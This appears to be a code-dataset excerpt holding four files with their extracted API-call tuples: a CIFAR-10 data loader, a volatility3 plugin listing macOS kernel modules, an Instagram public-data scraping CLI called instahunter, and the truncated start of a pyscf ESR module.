data = pickle.load(fo, encoding='bytes')
return data
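# Each batch dict uses byte-string keys: b'batch_label', b'labels',
# b'filenames' and b'data'. b'data' is a uint8 array of shape (10000, 3072);
# every row stores one 32x32 image channel-first (1024 red, then 1024 green,
# then 1024 blue values), which is why the loaders below reshape to
# (N, 3, 32, 32) before rolling the channel axis last.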
def load_cifar_10_data(data_dir, negatives=False):
"""
Return train_data, train_filenames, train_labels, test_data, test_filenames, test_labels
"""
# get the meta_data_dict
# num_cases_per_batch: 1000
# label_names: ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# num_vis: :3072
meta_data_dict = unpickle(data_dir + "/batches.meta")
cifar_label_names = meta_data_dict[b'label_names']
cifar_label_names = np.array(cifar_label_names)
# training data
cifar_train_data = None
cifar_train_filenames = []
cifar_train_labels = []
# cifar_train_data_dict
# 'batch_label': 'training batch 5 of 5'
# 'data': ndarray
# 'filenames': list
# 'labels': list
for i in range(1, 6):
cifar_train_data_dict = unpickle(data_dir + "/data_batch_{}".format(i))
if i == 1:
cifar_train_data = cifar_train_data_dict[b'data']
else:
cifar_train_data = np.vstack((cifar_train_data, cifar_train_data_dict[b'data']))
cifar_train_filenames += cifar_train_data_dict[b'filenames']
cifar_train_labels += cifar_train_data_dict[b'labels']
cifar_train_data = cifar_train_data.reshape((len(cifar_train_data), 3, 32, 32))
if negatives:
cifar_train_data = cifar_train_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_train_data = np.rollaxis(cifar_train_data, 1, 4)
cifar_train_filenames = np.array(cifar_train_filenames)
cifar_train_labels = np.array(cifar_train_labels)
# test data
# cifar_test_data_dict
# 'batch_label': 'testing batch 1 of 1'
# 'data': ndarray
# 'filenames': list
# 'labels': list
cifar_test_data_dict = unpickle(data_dir + "/test_batch")
cifar_test_data = cifar_test_data_dict[b'data']
cifar_test_filenames = cifar_test_data_dict[b'filenames']
cifar_test_labels = cifar_test_data_dict[b'labels']
cifar_test_data = cifar_test_data.reshape((len(cifar_test_data), 3, 32, 32))
if negatives:
cifar_test_data = cifar_test_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_test_data = np.rollaxis(cifar_test_data, 1, 4)
cifar_test_filenames = np.array(cifar_test_filenames)
cifar_test_labels = np.array(cifar_test_labels)
return cifar_train_data, cifar_train_filenames, cifar_train_labels, \
cifar_test_data, cifar_test_filenames, cifar_test_labels, cifar_label_names
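# A common next step before feeding a CNN is one-hot encoding the integer
# labels returned above. This helper is a minimal sketch and not part of the
# original loader:
def to_one_hot(labels, num_classes=10):
    """One-hot encode an integer label array, e.g. train_labels."""
    one_hot = np.zeros((labels.size, num_classes), dtype=np.float32)
    one_hot[np.arange(labels.size), labels] = 1.0
    return one_hot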
if __name__ == "__main__":
"""show it works"""
    cifar_10_dir = './cifar10-dataset'
train_data, train_filenames, train_labels, test_data, test_filenames, test_labels, label_names = \
load_cifar_10_data(cifar_10_dir)
print("Train data: ", train_data.shape)
print("Train filenames: ", train_filenames.shape)
print("Train labels: ", train_labels.shape)
print("Test data: ", test_data.shape)
print("Test filenames: ", test_filenames.shape)
print("Test labels: ", test_labels.shape)
print("Label names: ", label_names.shape)
# Don't forget that the label_names and filesnames are in binary and need conversion if used.
# display some random training images in a 25x25 grid
num_plot = 5
f, ax = plt.subplots(num_plot, num_plot)
for m in range(num_plot):
for n in range(num_plot):
idx = np.random.randint(0, train_data.shape[0])
ax[m, n].imshow(train_data[idx])
ax[m, n].get_xaxis().set_visible(False)
ax[m, n].get_yaxis().set_visible(False)
f.subplots_adjust(hspace=0.1)
f.subplots_adjust(wspace=0)
plt.show()
| [((36, 24, 36, 51), 'numpy.array', 'np.array', ({(36, 33, 36, 50): 'cifar_label_names'}, {}), '(cifar_label_names)', True, 'import numpy as np\n'), ((63, 28, 63, 59), 'numpy.array', 'np.array', ({(63, 37, 63, 58): 'cifar_train_filenames'}, {}), '(cifar_train_filenames)', True, 'import numpy as np\n'), ((64, 25, 64, 53), 'numpy.array', 'np.array', ({(64, 34, 64, 52): 'cifar_train_labels'}, {}), '(cifar_train_labels)', True, 'import numpy as np\n'), ((83, 27, 83, 57), 'numpy.array', 'np.array', ({(83, 36, 83, 56): 'cifar_test_filenames'}, {}), '(cifar_test_filenames)', True, 'import numpy as np\n'), ((84, 24, 84, 51), 'numpy.array', 'np.array', ({(84, 33, 84, 50): 'cifar_test_labels'}, {}), '(cifar_test_labels)', True, 'import numpy as np\n'), ((110, 12, 110, 44), 'matplotlib.pyplot.subplots', 'plt.subplots', ({(110, 25, 110, 33): 'num_plot', (110, 35, 110, 43): 'num_plot'}, {}), '(num_plot, num_plot)', True, 'import matplotlib.pyplot as plt\n'), ((119, 4, 119, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((20, 15, 20, 48), 'pickle.load', 'pickle.load', (), '', False, 'import pickle\n'), ((62, 27, 62, 62), 'numpy.rollaxis', 'np.rollaxis', ({(62, 39, 62, 55): 'cifar_train_data', (62, 57, 62, 58): '1', (62, 60, 62, 61): '4'}, {}), '(cifar_train_data, 1, 4)', True, 'import numpy as np\n'), ((82, 26, 82, 60), 'numpy.rollaxis', 'np.rollaxis', ({(82, 38, 82, 53): 'cifar_test_data', (82, 55, 82, 56): '1', (82, 58, 82, 59): '4'}, {}), '(cifar_test_data, 1, 4)', True, 'import numpy as np\n'), ((54, 31, 54, 92), 'numpy.vstack', 'np.vstack', ({(54, 41, 54, 91): "(cifar_train_data, cifar_train_data_dict[b'data'])"}, {}), "((cifar_train_data, cifar_train_data_dict[b'data']))", True, 'import numpy as np\n'), ((113, 18, 113, 59), 'numpy.random.randint', 'np.random.randint', ({(113, 36, 113, 37): '0', (113, 39, 113, 58): 'train_data.shape[0]'}, {}), '(0, train_data.shape[0])', True, 'import numpy as np\n')] |
leohearts/volatility3 | volatility3/framework/plugins/mac/lsmod.py | f52bd8d74fc47e63ea2611d0171b63dc589d4fdf | # This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0
# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0
#
"""A module containing a collection of plugins that produce data typically
found in Mac's lsmod command."""
from volatility3.framework import exceptions, renderers, interfaces, contexts
from volatility3.framework.configuration import requirements
from volatility3.framework.interfaces import plugins
from volatility3.framework.objects import utility
from volatility3.framework.renderers import format_hints
class Lsmod(plugins.PluginInterface):
"""Lists loaded kernel modules."""
_required_framework_version = (1, 0, 0)
_version = (1, 0, 0)
@classmethod
def get_requirements(cls):
return [
requirements.TranslationLayerRequirement(name = 'primary',
description = 'Memory layer for the kernel',
architectures = ["Intel32", "Intel64"]),
requirements.SymbolTableRequirement(name = "darwin", description = "Mac kernel")
]
@classmethod
def list_modules(cls, context: interfaces.context.ContextInterface, layer_name: str, darwin_symbols: str):
"""Lists all the modules in the primary layer.
Args:
context: The context to retrieve required elements (layers, symbol tables) from
layer_name: The name of the layer on which to operate
darwin_symbols: The name of the table containing the kernel symbols
Returns:
A list of modules from the `layer_name` layer
"""
kernel = contexts.Module(context, darwin_symbols, layer_name, 0)
kernel_layer = context.layers[layer_name]
kmod_ptr = kernel.object_from_symbol(symbol_name = "kmod")
try:
kmod = kmod_ptr.dereference().cast("kmod_info")
except exceptions.InvalidAddressException:
return []
yield kmod
try:
kmod = kmod.next
except exceptions.InvalidAddressException:
return []
seen = set()
while kmod != 0 and \
kmod not in seen and \
len(seen) < 1024:
kmod_obj = kmod.dereference()
if not kernel_layer.is_valid(kmod_obj.vol.offset, kmod_obj.vol.size):
break
seen.add(kmod)
yield kmod
try:
kmod = kmod.next
except exceptions.InvalidAddressException:
return
def _generator(self):
for module in self.list_modules(self.context, self.config['primary'], self.config['darwin']):
mod_name = utility.array_to_string(module.name)
mod_size = module.size
yield 0, (format_hints.Hex(module.vol.offset), mod_name, mod_size)
def run(self):
return renderers.TreeGrid([("Offset", format_hints.Hex), ("Name", str), ("Size", int)], self._generator())
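# Typical invocation from the volatility3 CLI (illustrative; the exact plugin
# path can vary between framework versions):
#
#     vol -f <macOS memory image> mac.lsmod.Lsmod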
| [((41, 17, 41, 72), 'volatility3.framework.contexts.Module', 'contexts.Module', ({(41, 33, 41, 40): 'context', (41, 42, 41, 56): 'darwin_symbols', (41, 58, 41, 68): 'layer_name', (41, 70, 41, 71): '0'}, {}), '(context, darwin_symbols, layer_name, 0)', False, 'from volatility3.framework import renderers, interfaces, contexts\n'), ((23, 12, 25, 92), 'volatility3.framework.configuration.requirements.TranslationLayerRequirement', 'requirements.TranslationLayerRequirement', (), '', False, 'from volatility3.framework.configuration import requirements\n'), ((26, 12, 26, 92), 'volatility3.framework.configuration.requirements.SymbolTableRequirement', 'requirements.SymbolTableRequirement', (), '', False, 'from volatility3.framework.configuration import requirements\n'), ((81, 23, 81, 59), 'volatility3.framework.objects.utility.array_to_string', 'utility.array_to_string', ({(81, 47, 81, 58): 'module.name'}, {}), '(module.name)', False, 'from volatility3.framework.objects import utility\n'), ((84, 22, 84, 57), 'volatility3.framework.renderers.format_hints.Hex', 'format_hints.Hex', ({(84, 39, 84, 56): 'module.vol.offset'}, {}), '(module.vol.offset)', False, 'from volatility3.framework.renderers import format_hints\n')] |
Araekiel/instahunter | instahunter.py | c07c10773bcf33bdc0d46b39a0dda3f55936b1f3 | '''
instahunter.py
Author: Araekiel
Copyright: Copyright © 2019, Araekiel
License: MIT
Version: 1.6.3
'''
import click
import requests
import json
from datetime import datetime
@click.group()
def cli():
"""Made by Araekiel | v1.6.3"""
headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"}
@click.command()
@click.option('-tag', prompt="Hashtag", help="The hashtag you want to search the posts with")
@click.option('--post-type', default="latest", help="latest: Get latest posts | top: Get top posts")
@click.option('-create-file', default="false", help="true: Create a file with the data | false: Will not create a file, false is default")
@click.option('--file-type', default="text", help="json: Create a json file | text: Create a text file, text is default")
def getposts(tag, post_type, create_file, file_type):
"""This command will fetch latest or top public posts with a Hashtag"""
try:
# Creating file if required, creating array json_data to store data if the file type is json
if(create_file == "true"):
if(file_type == "json"):
file = open(tag+"_posts.json", "w+")
json_data = []
else:
file = open(tag+"_posts.txt", "w+", encoding="utf-8")
counter = 0
api_url = "https://www.instagram.com/explore/tags/%s/?__a=1" % tag
req = requests.get(url=api_url, headers=headers)
data = req.json()
if(post_type == "top"):
edges = data["graphql"]["hashtag"]["edge_hashtag_to_top_posts"]["edges"]
else:
edges = data["graphql"]["hashtag"]["edge_hashtag_to_media"]["edges"]
# Looping through 'edges' in the data acquired
for edge in edges:
counter = counter + 1
# Collecting necessary data from each edge
try:
caption = edge["node"]["edge_media_to_caption"]["edges"][0]["node"]["text"]
            except Exception:
caption = "No Caption"
scraped_data = {
"id": counter,
"post_id": edge["node"]["id"],
"shortcode": edge["node"]["shortcode"],
"owner_id": edge["node"]["owner"]["id"],
"display_url": edge["node"]["display_url"],
"caption": caption,
"time": str(datetime.fromtimestamp(
edge["node"]["taken_at_timestamp"])),
"n_likes": edge["node"]["edge_liked_by"]["count"],
"n_comments": edge["node"]["edge_media_to_comment"]["count"],
"is_video": edge["node"]["is_video"]
}
if(create_file == "true"):
# If the file type is json then appending the data to json_data array instead of writing it to the file right away
if(file_type == "json"):
json_data.append(scraped_data)
else:
file.write("###############################\nID: %s \nPost ID: %s \nShortcode: %s \nOwner ID: %s \nDisplay URL: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nNumber of comments: %s \nIs Video: %s \n###############################\n\n\n\n\n" % (
str(counter), str(scraped_data["post_id"]), str(scraped_data["shortcode"]), str(scraped_data["owner_id"]), str(scraped_data["display_url"]), str(scraped_data["caption"]), str(scraped_data["time"]), str(scraped_data["n_likes"]), str(scraped_data["n_comments"]), str(scraped_data["is_video"])))
else:
click.echo("###############################\nID: %s \nPost ID: %s \nShortcode: %s \nOwner ID: %s \nDisplay URL: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nNumber of comments: %s \nIs Video: %s \n###############################\n\n\n\n\n" % (
counter, scraped_data["post_id"], scraped_data["shortcode"], scraped_data["owner_id"], scraped_data["display_url"], scraped_data["caption"], scraped_data["time"], scraped_data["n_likes"], scraped_data["n_comments"], scraped_data["is_video"]))
if(create_file == "true"):
# Closing the file and dumping the data before closing if the file type is json
if(file_type == "json"):
json.dump(json_data, file)
click.echo("File Created, name: '%s_posts.json'" % tag)
else:
click.echo("File Created, name: '%s_posts.txt" % tag)
file.close()
else:
click.echo("Done!")
    except Exception:
click.echo(
"Couldn't retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection")
@click.command()
@click.option('-username', prompt="Username", help="Username you want to search the user with")
@click.option('-create-file', default="false", help="true: Create a file with the data | false: Will not create a file, false is default")
@click.option('--file-type', default="text", help="json: Create a json file | text: Create a text file, text is default")
def getuser(username, create_file, file_type):
"""This command will fetch user data with a Username"""
api_url = "https://www.instagram.com/%s/?__a=1" % username
try:
req = requests.get(url=api_url, headers=headers)
data = req.json()
# Collecting necessary data
user = data["graphql"]["user"]
if(user["highlight_reel_count"] > 0):
has_highlights = True
else:
has_highlights = False
scraped_data = {
"user_id": user["id"],
"username": user["username"],
"full_name": user["full_name"],
"profile_pic_url": user["profile_pic_url_hd"],
"bio": user["biography"],
"n_uploads": user["edge_owner_to_timeline_media"]["count"],
"n_followers": user["edge_followed_by"]["count"],
"n_following": user["edge_follow"]["count"],
"is_private": user["is_private"],
"is_verified": user["is_verified"],
"external_url": user["external_url"],
"igtv_videos": user["edge_felix_video_timeline"]["count"],
"has_highlights": has_highlights
}
if(create_file == "true"):
if(file_type == "json"):
file = open(username+"_user.json", "w+")
json.dump(scraped_data, file)
file.close()
click.echo("File Created, name: '%s_user.json'" % str(username))
else:
file = open(username+"_user.txt", "w+", encoding="utf-8")
file.write("User ID: %s \nUsername: %s \nFull Name: %s \nProfile Pic URL: %s \nBio: %s \nUploads: %s \nFollowers: %s \nFollowing: %s \nPrivate ID: %s \nVerified ID: %s \nExternal URL: %s \nIGTV videos: %s \nHas highlights: %s" % (
str(scraped_data["user_id"]), scraped_data["username"], scraped_data["full_name"], scraped_data["profile_pic_url"], scraped_data["bio"], str(scraped_data["n_uploads"]), str(scraped_data["n_followers"]), str(scraped_data["n_following"]), str(scraped_data["is_private"]), str(scraped_data["is_verified"]), scraped_data["external_url"], str(scraped_data["igtv_videos"]), str(scraped_data["has_highlights"])))
file.close()
click.echo("File Created, name: '%s_user.txt'" % str(username))
else:
click.echo("User ID: %s \nUsername: %s \nFull Name: %s \nProfile Pic URL: %s \nBio: %s \nUploads: %s \nFollowers: %s \nFollowing: %s \nPrivate ID: %s \nVerified ID: %s \nExternal URL: %s \nIGTV videos: %s \nHas highlights: %s" % (
str(scraped_data["user_id"]), scraped_data["username"], scraped_data["full_name"], scraped_data["profile_pic_url"], scraped_data["bio"], str(scraped_data["n_uploads"]), str(scraped_data["n_followers"]), str(scraped_data["n_following"]), str(scraped_data["is_private"]), str(scraped_data["is_verified"]), scraped_data["external_url"], str(scraped_data["igtv_videos"]), str(scraped_data["has_highlights"])))
click.echo('Done!')
    except Exception:
click.echo(
"Couldn't retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection")
@click.command()
@click.option('-username', prompt="Username", help='The username of the user whose recent posts you want to fetch')
@click.option('-create-file', default="false", help="true: Create a file with the data | false: Will not create a file, false is default")
@click.option('--file-type', default="text", help="json: Create a json file | text: Create a text file, text is default")
def getuserposts(username, create_file, file_type):
"""This command will fetch recent posts of a user with a Username"""
try:
# Creating file if required, creating array json_data to store data if the file type is json
if(create_file == "true"):
if(file_type == "json"):
file = open(username+"_posts.json", "w+")
json_data = []
else:
file = open(username+"_posts.txt", "w+", encoding="utf-8")
counter = 0
api_url = "https://www.instagram.com/%s/?__a=1" % username
req = requests.get(url=api_url, headers=headers)
data = req.json()
posts = data["graphql"]["user"]["edge_owner_to_timeline_media"]["edges"]
# Looping through posts
for post in posts:
counter = counter + 1
node = post["node"]
# Collecting necessary data
try:
caption = node["edge_media_to_caption"]["edges"][0]["node"]["text"]
            except Exception:
caption = ""
try:
location = node["location"]["name"]
            except Exception:
location = "No Location"
scraped_data = {
"id": counter,
"post_id": node["id"],
"shortcode": node["shortcode"],
"display_url": node["display_url"],
"height": node["dimensions"]["height"],
"width": node["dimensions"]["width"],
"caption": caption,
"time": str(datetime.fromtimestamp(node["taken_at_timestamp"])),
"n_likes": node["edge_liked_by"]["count"],
"comments_disabled": node["comments_disabled"],
"n_comments": node["edge_media_to_comment"]["count"],
"location": location,
"is_video": node["is_video"]
}
if(create_file == "true"):
if(file_type == "json"):
# If the file type is json then appending the data to json_data array instead of writing it to the file right away
json_data.append(scraped_data)
else:
file.write("###############################\nID: %s \nPost ID: %s \nShortcode: %s \nDisplay URL: %s \nImage Height: %s \nImage Width: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nComments Disabled: %s \nNumber of comments: %s \nLocation: %s \nIs Video: %s \n###############################\n\n\n\n\n" % (
str(counter), str(scraped_data["post_id"]), str(scraped_data["shortcode"]), str(scraped_data["display_url"]), str(scraped_data["height"]), str(scraped_data["width"]), str(scraped_data["caption"]), str(scraped_data["time"]), str(scraped_data["n_likes"]), str(scraped_data["comments_disabled"]), str(scraped_data["n_comments"]), str(scraped_data["location"]), str(scraped_data["is_video"])))
else:
click.echo("###############################\nID: %s \nPost ID: %s \nShortcode: %s \nDisplay URL: %s \nImage Height: %s \nImage Width: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nComments Disabled: %s \nNumber of comments: %s \nLocation: %s \nIs Video: %s \n###############################\n\n\n\n\n" % (
str(counter), str(scraped_data["post_id"]), str(scraped_data["shortcode"]), str(scraped_data["display_url"]), str(scraped_data["height"]), str(scraped_data["width"]), str(scraped_data["caption"]), str(scraped_data["time"]), str(scraped_data["n_likes"]), str(scraped_data["comments_disabled"]), str(scraped_data["n_comments"]), str(scraped_data["location"]), str(scraped_data["is_video"])))
if(create_file == "true"):
# Closing the file and dumping the data before closing if the file type is json
if(file_type == "json"):
json.dump(json_data, file)
click.echo("File Created, name: '%s_posts.json'" % username)
else:
click.echo("File Created, name: '%s_posts.txt" % username)
file.close()
else:
click.echo("Done!")
    except Exception:
click.echo(
"Couldn't retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection")
@click.command()
@click.option('-query', prompt="Query", help="The term you want to search users with")
@click.option('-create-file', default="false", help="true: Create a file with the data | false: Will not create a file, false is default")
@click.option('--file-type', default="text", help="json: Create a json file | text: Create a text file, text is default")
def search(query, create_file, file_type):
"""This command searches for users on instagram"""
try:
if(create_file == "true"):
if(file_type == "json"):
file = open(query+"_users.json", "w+")
json_data = []
else:
file = open(query+"_users.text",
"w+", encoding="utf-8")
counter = 0
api_url = "https://www.instagram.com/web/search/topsearch/?query=%s" % query
req = requests.get(api_url, headers=headers)
data = req.json()
users = data["users"]
for user in users:
counter = counter + 1
scraped_data = {
"id": counter,
"user_id": user["user"]["pk"],
"username": user["user"]["username"],
"full_name": user["user"]["full_name"],
"profile_pic_url": user["user"]["profile_pic_url"],
"is_private": user["user"]["is_private"],
"is_verified": user["user"]["is_verified"],
}
if(create_file == "true"):
# If the file type is json then appending the data to json_data array instead of writing it to the file right away
if(file_type == "json"):
json_data.append(scraped_data)
else:
file.write("###############################\nID: %s \nUser ID: %s \nUsername: %s \nFull Name: %s \nProfile Pic URL: %s \nPrivate ID: %s \nVerified ID: %s \n###############################\n\n\n\n\n" % (str(counter), str(
scraped_data["user_id"]), str(scraped_data["username"]), str(scraped_data["full_name"]), str(scraped_data["profile_pic_url"]), str(scraped_data["is_private"]), str(scraped_data["is_verified"])))
else:
click.echo("###############################\nID: %s \nUser ID: %s \nUsername: %s \nFull Name: %s \nProfile Pic URL: %s \nPrivate ID: %s \nVerified ID: %s \n###############################\n\n\n\n\n" % (str(counter), str(
scraped_data["user_id"]), str(scraped_data["username"]), str(scraped_data["full_name"]), str(scraped_data["profile_pic_url"]), str(scraped_data["is_private"]), str(scraped_data["is_verified"])))
if(create_file == "true"):
# Closing the file and dumping the data before closing if the file type is json
if(file_type == "json"):
json.dump(json_data, file)
click.echo("File Created, name: '%s_users.json'" %
query)
else:
click.echo("File Created, name: '%s_users.txt'" %
query)
file.close()
else:
click.echo("Done!")
    except Exception:
click.echo(
"Couldn't retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection")
cli.add_command(getposts)
cli.add_command(getuser)
cli.add_command(getuserposts)
cli.add_command(search)
if __name__ == "__main__":
cli()
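# Example invocations (illustrative; run from a shell):
#
#   python instahunter.py getposts -tag nature --post-type top
#   python instahunter.py getuser -username instagram -create-file true --file-type json
#   python instahunter.py getuserposts -username instagram
#   python instahunter.py search -query john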
| [((16, 1, 16, 14), 'click.group', 'click.group', ({}, {}), '()', False, 'import click\n'), ((22, 1, 22, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((23, 1, 23, 93), 'click.option', 'click.option', (), '', False, 'import click\n'), ((24, 1, 24, 100), 'click.option', 'click.option', (), '', False, 'import click\n'), ((25, 1, 25, 138), 'click.option', 'click.option', (), '', False, 'import click\n'), ((26, 1, 26, 121), 'click.option', 'click.option', (), '', False, 'import click\n'), ((92, 1, 92, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((93, 1, 93, 95), 'click.option', 'click.option', (), '', False, 'import click\n'), ((94, 1, 94, 138), 'click.option', 'click.option', (), '', False, 'import click\n'), ((95, 1, 95, 121), 'click.option', 'click.option', (), '', False, 'import click\n'), ((146, 1, 146, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((147, 1, 147, 112), 'click.option', 'click.option', (), '', False, 'import click\n'), ((148, 1, 148, 138), 'click.option', 'click.option', (), '', False, 'import click\n'), ((149, 1, 149, 121), 'click.option', 'click.option', (), '', False, 'import click\n'), ((218, 1, 218, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((219, 1, 219, 86), 'click.option', 'click.option', (), '', False, 'import click\n'), ((220, 1, 220, 138), 'click.option', 'click.option', (), '', False, 'import click\n'), ((221, 1, 221, 121), 'click.option', 'click.option', (), '', False, 'import click\n'), ((39, 14, 39, 56), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((102, 14, 102, 56), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((162, 14, 162, 56), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((234, 14, 234, 52), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((87, 12, 87, 31), 'click.echo', 'click.echo', ({(87, 23, 87, 30): '"""Done!"""'}, {}), "('Done!')", False, 'import click\n'), ((89, 8, 90, 193), 'click.echo', 'click.echo', ({(90, 12, 90, 192): '"""Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""'}, {}), '(\n """Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""\n )', False, 'import click\n'), ((140, 12, 140, 31), 'click.echo', 'click.echo', ({(140, 23, 140, 30): '"""Done!"""'}, {}), "('Done!')", False, 'import click\n'), ((142, 8, 143, 193), 'click.echo', 'click.echo', ({(143, 12, 143, 192): '"""Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""'}, {}), '(\n """Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""\n )', False, 'import click\n'), ((212, 12, 212, 31), 'click.echo', 'click.echo', ({(212, 23, 212, 30): '"""Done!"""'}, {}), "('Done!')", False, 'import click\n'), ((214, 8, 215, 193), 'click.echo', 'click.echo', ({(215, 12, 215, 192): '"""Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. 
There is a problem with your internet connection"""'}, {}), '(\n """Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""\n )', False, 'import click\n'), ((269, 12, 269, 31), 'click.echo', 'click.echo', ({(269, 23, 269, 30): '"""Done!"""'}, {}), "('Done!')", False, 'import click\n'), ((271, 8, 272, 193), 'click.echo', 'click.echo', ({(272, 12, 272, 192): '"""Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""'}, {}), '(\n """Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""\n )', False, 'import click\n'), ((76, 16, 77, 262), 'click.echo', 'click.echo', ({(76, 27, 77, 261): '("""###############################\nID: %s \nPost ID: %s \nShortcode: %s \nOwner ID: %s \nDisplay URL: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nNumber of comments: %s \nIs Video: %s \n###############################\n\n\n\n\n"""\n % (counter, scraped_data[\'post_id\'], scraped_data[\'shortcode\'],\n scraped_data[\'owner_id\'], scraped_data[\'display_url\'], scraped_data[\n \'caption\'], scraped_data[\'time\'], scraped_data[\'n_likes\'], scraped_data\n [\'n_comments\'], scraped_data[\'is_video\']))'}, {}), '(\n """###############################\nID: %s \nPost ID: %s \nShortcode: %s \nOwner ID: %s \nDisplay URL: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nNumber of comments: %s \nIs Video: %s \n###############################\n\n\n\n\n"""\n % (counter, scraped_data[\'post_id\'], scraped_data[\'shortcode\'],\n scraped_data[\'owner_id\'], scraped_data[\'display_url\'], scraped_data[\n \'caption\'], scraped_data[\'time\'], scraped_data[\'n_likes\'], scraped_data\n [\'n_comments\'], scraped_data[\'is_video\']))', False, 'import click\n'), ((81, 16, 81, 42), 'json.dump', 'json.dump', ({(81, 26, 81, 35): 'json_data', (81, 37, 81, 41): 'file'}, {}), '(json_data, file)', False, 'import json\n'), ((82, 16, 82, 71), 'click.echo', 'click.echo', ({(82, 27, 82, 70): '("File Created, name: \'%s_posts.json\'" % tag)'}, {}), '("File Created, name: \'%s_posts.json\'" % tag)', False, 'import click\n'), ((84, 16, 84, 69), 'click.echo', 'click.echo', ({(84, 27, 84, 68): '("File Created, name: \'%s_posts.txt" % tag)'}, {}), '("File Created, name: \'%s_posts.txt" % tag)', False, 'import click\n'), ((128, 16, 128, 45), 'json.dump', 'json.dump', ({(128, 26, 128, 38): 'scraped_data', (128, 40, 128, 44): 'file'}, {}), '(scraped_data, file)', False, 'import json\n'), ((206, 16, 206, 42), 'json.dump', 'json.dump', ({(206, 26, 206, 35): 'json_data', (206, 37, 206, 41): 'file'}, {}), '(json_data, file)', False, 'import json\n'), ((207, 16, 207, 76), 'click.echo', 'click.echo', ({(207, 27, 207, 75): '("File Created, name: \'%s_posts.json\'" % username)'}, {}), '("File Created, name: \'%s_posts.json\'" % username)', False, 'import click\n'), ((209, 16, 209, 74), 'click.echo', 'click.echo', ({(209, 27, 209, 73): '("File Created, name: \'%s_posts.txt" % username)'}, {}), '("File Created, name: \'%s_posts.txt" % username)', False, 'import click\n'), ((261, 16, 261, 42), 'json.dump', 'json.dump', ({(261, 26, 261, 35): 'json_data', (261, 37, 261, 41): 'file'}, {}), '(json_data, file)', False, 'import json\n'), ((262, 16, 263, 33), 'click.echo', 
'click.echo', ({(262, 27, 263, 32): '("File Created, name: \'%s_users.json\'" % query)'}, {}), '("File Created, name: \'%s_users.json\'" % query)', False, 'import click\n'), ((265, 16, 266, 33), 'click.echo', 'click.echo', ({(265, 27, 266, 32): '("File Created, name: \'%s_users.txt\'" % query)'}, {}), '("File Created, name: \'%s_users.txt\'" % query)', False, 'import click\n'), ((62, 28, 63, 55), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', ({(63, 20, 63, 54): "edge['node']['taken_at_timestamp']"}, {}), "(edge['node']['taken_at_timestamp'])", False, 'from datetime import datetime\n'), ((186, 28, 186, 78), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', ({(186, 51, 186, 77): "node['taken_at_timestamp']"}, {}), "(node['taken_at_timestamp'])", False, 'from datetime import datetime\n')] |
azag0/pyscf | pyscf/prop/esr/uks.py | 1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b | #!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <[email protected]>
#
'''
Non-relativistic unrestricted Kohn-Sham electron spin-rotation coupling
(In testing)
Refs:
J. Phys. Chem. A. 114, 9246, 2010
Mole. Phys. 9, 6, 585, 1964
'''
from functools import reduce
import numpy, sys
from pyscf import lib
from pyscf.lib import logger
from pyscf.dft import numint
from pyscf.prop.nmr import uks as uks_nmr
from pyscf.prop.esr import uhf as uhf_esr
from pyscf.prop.esr.uhf import _write, align
from pyscf.data import nist
from pyscf.grad import rks as rks_grad
# Note mo10 is the imaginary part of MO^1
def para(obj, mo10, mo_coeff, mo_occ, qed_fac=1):
mol = obj.mol
effspin = mol.spin * .5
